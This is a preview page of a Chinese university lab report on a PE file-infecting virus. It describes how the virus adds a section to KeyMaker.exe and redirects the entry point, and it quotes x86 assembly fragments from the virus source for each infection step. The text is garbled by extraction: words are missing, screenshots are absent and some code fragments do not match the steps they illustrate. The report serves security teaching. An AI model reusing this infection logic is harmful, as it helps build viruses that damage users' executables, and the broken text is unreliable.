東華大學(xué)計(jì)算機(jī)病毒PE病毒實(shí)驗(yàn)報(bào)告_第1頁
東華大學(xué)計(jì)算機(jī)病毒PE病毒實(shí)驗(yàn)報(bào)告_第2頁
東華大學(xué)計(jì)算機(jī)病毒PE病毒實(shí)驗(yàn)報(bào)告_第3頁
東華大學(xué)計(jì)算機(jī)病毒PE病毒實(shí)驗(yàn)報(bào)告_第4頁
東華大學(xué)計(jì)算機(jī)病毒PE病毒實(shí)驗(yàn)報(bào)告_第5頁
已閱讀5頁,還剩12頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

試驗(yàn)報(bào)告1一.PE一:參照病毒感染PE7〔文字和截屏形式〕病毒感染文件過程(以感染文件KeyMaker.exe為例):重定位,獲得全部API2通過軟件Stud_PE可查看可執(zhí)行文件KeyMaker.exe的構(gòu)造可查看文件內(nèi)容:推斷目標(biāo)文件開頭的兩個(gè)字節(jié)是否為“MZ”:推斷PEPE”:推斷感染標(biāo)記,假設(shè)已被感染過則跳出連續(xù)執(zhí)行宿主程序,否則連續(xù):3IMAGE_FILE_HEADERNumberOfSectionsDataDirectory〔數(shù)據(jù)名目〕〔每個(gè)數(shù)據(jù)名目信息占8個(gè)字節(jié):得到節(jié)表起始位置。(數(shù)據(jù)名目的偏移地址+數(shù)據(jù)名目占用的字節(jié)數(shù)=節(jié)表起始位置)。得到節(jié)表的末尾偏移〔緊接其后用于寫入一個(gè)的病毒節(jié)信息〕節(jié)表起始位置+節(jié)的個(gè)數(shù)*(每個(gè)節(jié)表占用的字節(jié)數(shù)28H)=節(jié)表的末尾偏移。4開頭寫入節(jié)表,感染文件:二:在把握Stud_PE工具的根底上,比較文件感染前后有哪些變化。感染前:感染后:54處發(fā)生了變化:1:PE感染病毒后KeyMaker.exe程序的入口點(diǎn)變成了病毒文件的入口點(diǎn)。2:PointerToRawData域值,即該文件的偏移量發(fā)生了變化;3:imag4:Numberofsections67由.exe文件感染前后變化可知,PE病毒感染過程即在文件中添加一個(gè)節(jié),把病毒代碼和病毒執(zhí)行后返回宿主程序的代碼寫入添加的節(jié)中,同時(shí)修改 PE文件頭中入口點(diǎn)AddressOfEntryPoin,使其指向添加的病毒代碼入口。程序染毒后運(yùn)行結(jié)果:1:首先執(zhí)行病毒程序:2:病毒代碼執(zhí)行完后執(zhí)行宿主程序:8三:針對病毒源代碼,指出與感染PE文件步驟相對應(yīng)的程序段1.推斷目標(biāo)文件開頭的兩個(gè)字節(jié)是否為“MZ”。lea eax,[ebx+offsetszMsg1]push eaxcall SingleTest2.推斷PEPE”。cmp wordptr[edi],IMAGE_DOS_SIGNATUREjne Errormov esi,ediadd esi,[esi+003ch]cmp wordptr[esi],IMAGE_NT_SIGNATUREjne Errormov dwReturn,edijmp @f推斷感染標(biāo)記,假設(shè)已被感染過則跳出連續(xù)執(zhí)行宿主程序,否則連續(xù)。mov ecx,[esi+74h] ;imul ecx,ecx,89lea eax,[ecx+esi+78h]movzx ecx,wordptr[esi+6h]imul ecx,ecx,28hadd eax,ecxsub eax,28hcmp dwordptr[eax],”SI”je @f獲得DataDirector〔數(shù)據(jù)名目〕〔每個(gè)數(shù)據(jù)名目信息占8個(gè)字節(jié)。pop esiadd ebx,4inc edxcmp edx,[esi].NumberOfNamesjl @bjmp Error得到節(jié)表起始位置。(數(shù)據(jù)名目的偏移地址+數(shù)據(jù)名目占用的字節(jié)數(shù)=節(jié)表起始位置)mov esi,hModuleadd esi,[esi+3ch]assume esi:ptrIMAGE_NT_HEADERSmov esi,[esi].OptionalHeader.DataDirectory.VirtualAddressadd esi,hModuleassume esi:ptrIMAGE_EXPORT_DIRECTORY6.得到節(jié)表的末尾偏移〔緊接其后用于寫入一個(gè)的病毒節(jié)信息〕節(jié)表起始位置+節(jié)的個(gè)數(shù)*(每個(gè)節(jié)表占用的字節(jié)數(shù)28H)=節(jié)表的末尾偏移。mov [ebx+hFile],eax10push 0push eaxcall [ebx+lpGetFileSize]cmp eax,-1je CloseFilemov [ebx+dwFileSize],eaxadd eax,1000h7.開頭寫入節(jié)表xor eax,eaxsub edi,[ebx+lpMemory]pusheax;FILE-BEGINpusheaxpushedipush [ebx+hFile]call [ebx+lpSetFilePointer]push [ebx+hFile]call [ebx+lpSetEndOfF

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論